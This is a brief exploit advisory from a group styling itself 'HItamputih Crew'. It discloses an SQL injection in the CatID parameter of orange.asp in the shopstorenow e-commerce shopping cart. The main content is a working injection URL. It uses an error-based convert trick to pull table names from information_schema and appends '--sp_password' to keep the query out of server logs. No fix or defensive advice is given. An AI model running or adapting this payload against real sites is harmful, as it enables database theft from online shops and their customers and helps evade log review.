============================= HItamputih Crew ==================== #hitamputih Advisory ##Discovered By : IbnuSina #----------------------------------------------------------- #Software: shopstorenow E-commerce Shopping Cart #Method: SQL Injection # [[SQL]]]--------------------------------------------------------- http://[target]/[path]//orange.asp?CatID=[SQL] ================================================ ex: http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password #########################################################################################
